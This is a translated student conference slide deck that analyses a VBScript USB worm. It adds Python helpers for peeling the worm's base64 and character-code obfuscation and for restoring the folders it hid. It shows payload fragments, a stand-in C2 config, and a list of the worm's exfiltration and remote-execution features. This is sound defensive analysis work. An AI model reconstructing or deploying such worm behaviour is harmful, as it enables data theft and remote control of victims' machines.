VBScript Malware Analysis
Hanyang University ICEWALL
Sangwon Lee (devleoper)
2015/06/27 @ KUSISWALL
devleoper, Sangwon Lee
• Computer science major at Hanyang University / ICEWALL member
• "devleoper" is not a typo.
• Used PHP in the past and mostly Ruby these days; got into web development and so study web and network security.
• leo.re.kr
  twitter @devleoper
  fb.me/devleoper
Getting started
• Malware picked up by plugging a USB stick into a lab computer at school
• Running OS X, so there was no way to get infected… but let's take it apart anyway
• Turned out to be malware written in VBScript (.vbs)
• Let's take it apart together
Scripting languages
• A language whose source code is read and executed on the fly at the moment the program runs
• Convenient when a language that has to be compiled every time is a hassle
• Widely used now that computers are fast enough
• Many programs are distributed as source code
• PHP, Python, Ruby, JavaScript, VBScript
VBScript
• A scripting language made by Microsoft
• Shipped by default with most versions of Windows since Windows 98
• As the name says, its syntax comes from Visual Basic
• In its heyday it was also used for web development with ASP
Opening the file…
ali = fuck("UkZwRFRFOVdSVklnUFNBaU16bDhaSHA4TmpCOFpIcDhPVEY4WkhwOE16SjhaSHA4TVRFMGZHUjZmREV3TVh4a2Vudz …
Base64
• A way of representing binary values as characters people can read
• Uppercase + lowercase + digits + plus and slash make 64
• Takes the bits six at a time from the front and represents each group as one character
• It is so simple that calling it encryption is a stretch…
Original:  L        e        o
Binary:    01001100 01100101 01101111
base64:    T G V v
Scrolling further down…
After decoding twice…
DZCLOVER = "39|dz|60|dz|91|dz|32|dz|114|dz|101|dz|99|dz|111|dz|100|dz|101|dz|114|dz|32|dz|58|dz|32|dz| …
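The decoding chain the slides walk through (base64, base64 again, then decimal character codes joined by `|dz|` inside a VBScript string), written up as an added Python helper for analysts; this is not code from the deck, the function and variable names are ours, and the sample blob is constructed here, not the real worm.

```python
import base64
import re
import string

# Layout seen in the deck: base64 -> base64 -> VBScript assignment whose
# string literal holds decimal character codes joined by "|dz|".
SEP = "|dz|"
B64_CHARS = re.compile(r"[A-Za-z0-9+/]+={0,2}")
PRINTABLE = set(string.printable)


def peel_base64(blob: str, max_layers: int = 8) -> tuple[str, int]:
    """Base64-decode repeatedly while the result is still printable text that
    looks like base64. Returns (innermost text, number of layers removed)."""
    text = re.sub(r"\s+", "", blob)
    layers = 0
    while layers < max_layers and B64_CHARS.fullmatch(text) and len(text) % 4 == 0:
        try:
            decoded = base64.b64decode(text, validate=True).decode("latin-1")
        except ValueError:  # binascii.Error is a ValueError subclass
            break
        if not set(decoded) <= PRINTABLE:
            break  # reached binary data; keep the previous text layer
        text, layers = decoded, layers + 1
    return text, layers


def decode_charcodes(text: str, sep: str = SEP) -> str:
    """Turn '39|dz|60|dz|...' back into characters. If the codes sit inside a
    VBScript string literal (DZCLOVER = "..."), only that literal is decoded."""
    m = re.search(r'"([0-9|dz]+)"', text)
    codes = m.group(1) if m else text
    return "".join(chr(int(p)) for p in codes.split(sep) if p)


def deobfuscate(blob: str) -> tuple[str, int]:
    """Full chain: peel the base64 layers, then expand the character codes."""
    inner, layers = peel_base64(blob)
    return decode_charcodes(inner), layers


def extract_config(source: str) -> dict[str, str]:
    """Pull 'name = value' lines (host, port, installdir, ...) out of the
    recovered script; VBScript comment lines start with ' and are skipped."""
    pairs = re.findall(r"^\s*(\w+)\s*=\s*(.*?)\s*$", source, re.MULTILINE)
    return {k.lower(): v.strip('"') for k, v in pairs}


def build_sample(source: str) -> str:
    """Constructed test input: wrap a script the way the deck's sample was."""
    codes = SEP.join(str(ord(c)) for c in source) + SEP
    inner = f'DZCLOVER = "{codes}"'
    once = base64.b64encode(inner.encode("ascii")).decode("ascii")
    return base64.b64encode(once.encode("ascii")).decode("ascii")


# Constructed stand-in for the worm's config block; not the real payload.
SAMPLE_SOURCE = (
    "'<[ constructed sample config ]>\r\n"
    'host = "c2.example.invalid"\r\n'
    "port = 1234\r\n"
    'installdir = "%temp%"\r\n'
)
SAMPLE_BLOB = build_sample(SAMPLE_SOURCE)

if __name__ == "__main__":
    recovered, n = deobfuscate(SAMPLE_BLOB)
    print(f"{n} base64 layers removed")
    print(recovered)
    print(extract_config(recovered))
```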
I got the source
Opening the source
• Nicely commented and well indented
• Runs forever in an infinite loop, and whenever another storage device is connected or a new folder appears, it hides it…
Opening the source
• Sends the computer name, user name, installed hardware and the list of antivirus software to a designated server
Opening the source
• Code that downloads files from, or uploads files to, the designated server was also found
How do others see it?
• Submitted it to VirusTotal: 33 of 57 antivirus engines detect this malware
• With the latest Windows Defender, it is deleted instantly★ the moment the infected USB stick is plugged in
https://www.virustotal.com/ko/file/84b5033d5acd2a964dcf2ddd9d8c840aa8b8a9a8bc860bbce946fc9cf7642cda/analysis/
How do others see it?
http://www.symantec.com/security_response/writeup.jsp?docid=2013-091222-3652-99
http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Worm%3AVBS%2FDunihi.A
Spreads via USB or removable media.
Allows a hacker to access your PC.
• Sends HTTP POST requests to a remote server
  (transmitting the PC name, user name, disk volume and serial, OS version, list of antivirus software, etc.)
• Executes commands on the infected PC
• Downloads and executes files
• Sends local files to the attacker
• …
Summary
• In a scripting language, obfuscation is pointless: the code has to turn back into the original source (eval) to run anyway
• There is a reason shared computers don't let you plug in USB sticks
• Danger is always lurking around us, so don't plug in other people's USB sticks, and don't plug your USB stick into other people's computers!
The end…
…not! I disinfected it, but now my folders are gone!
What was it doing while making shortcuts and hiding things?
Help me, TechNet!
Constant   Value  Description
Normal     0      No attribute values set
ReadOnly   1      Can be read but not modified
Hidden     2      Not visible in My Computer or Windows Explorer
System     4      A file the operating system needs
https://technet.microsoft.com/en-us/library/ee198707.aspx
• When FileSystemObject reads or changes a file's attribute value, the value is computed by adding the values of the matching constants
  (much like permissions on a Unix system)
2 + 4 = hidden file + system file
Unchecking the box does make them show up, but…
• Because they count as protected operating system files, they can neither be seen the usual way nor have the protection removed.
Writing a restore script
https://gist.github.com/devleoper/60262bf56077d8d3e35d
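Added example (not the deck's gist script): the attribute arithmetic from the TechNet table modelled in Python over a constructed listing of a cleaned USB stick. The bits beyond 0/1/2/4 (Directory = 16, Archive = 32) come from the same Scripting Runtime enumeration; treating Hidden + System together as "hidden by the worm" is our assumption, and all names are ours.

```python
# FileSystemObject attribute bits: the four from the TechNet table in the deck
# plus two more from the same Scripting Runtime enumeration that show up here.
NORMAL, READONLY, HIDDEN, SYSTEM = 0, 1, 2, 4
DIRECTORY, ARCHIVE = 16, 32

FLAG_NAMES = [
    (READONLY, "ReadOnly"), (HIDDEN, "Hidden"), (SYSTEM, "System"),
    (DIRECTORY, "Directory"), (ARCHIVE, "Archive"),
]


def describe(attrs: int) -> list[str]:
    """Name the bits set in an Attributes value, e.g. 22 -> Hidden, System, Directory."""
    names = [name for bit, name in FLAG_NAMES if attrs & bit]
    return names or ["Normal"]


def worm_hidden(attrs: int) -> bool:
    """The pattern the deck describes: Hidden + System (2 + 4) set together, so the
    entry stays invisible even with 'show hidden files' turned on (our assumption
    that this combination on a USB stick was set by the worm, not the user)."""
    return (attrs & (HIDDEN | SYSTEM)) == (HIDDEN | SYSTEM)


def unhide(attrs: int) -> int:
    """Clear Hidden and System with a bit mask. Subtracting 6 only works when
    both bits are set; on 16 (a plain folder) it would yield 10, a value that
    turns the Hidden bit ON instead of off."""
    return attrs & ~(HIDDEN | SYSTEM)


def restore_plan(listing: list[tuple[str, int]]) -> dict[str, int]:
    """Given (name, Attributes) pairs, return the new Attributes value for every
    entry the worm hid. Hidden-only entries are left alone: the user may have set that."""
    return {name: unhide(a) for name, a in listing if worm_hidden(a)}


# Constructed directory listing of a cleaned USB stick (not taken from the deck).
SAMPLE_LISTING = [
    ("Photos", HIDDEN | SYSTEM | DIRECTORY),  # 22: folder hidden by the worm
    ("Photos.lnk", ARCHIVE),                  # 32: the shortcut it left behind
    ("notes.txt", ARCHIVE),                   # 32: untouched file
    ("Private", HIDDEN | DIRECTORY),          # 18: hidden only, leave it alone
]

if __name__ == "__main__":
    for name, attrs in SAMPLE_LISTING:
        print(f"{name:12} {attrs:3}  {', '.join(describe(attrs))}")
    # VBScript equivalent per entry: f.Attributes = f.Attributes And Not (2 + 4)
    # Command-line equivalent: attrib -s -h <name>
    print(restore_plan(SAMPLE_LISTING))
```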
One more summary
• So far we analyzed the Houdini Worm and went as far as restoring our USB sticks.
• Take good care of your USB sticks.
• When moving files to a shared computer, the cloud is safe… right?
• Scripting languages are worth learning.
The real end
Thank you
twitter @devleoper

fb.me/devleoper
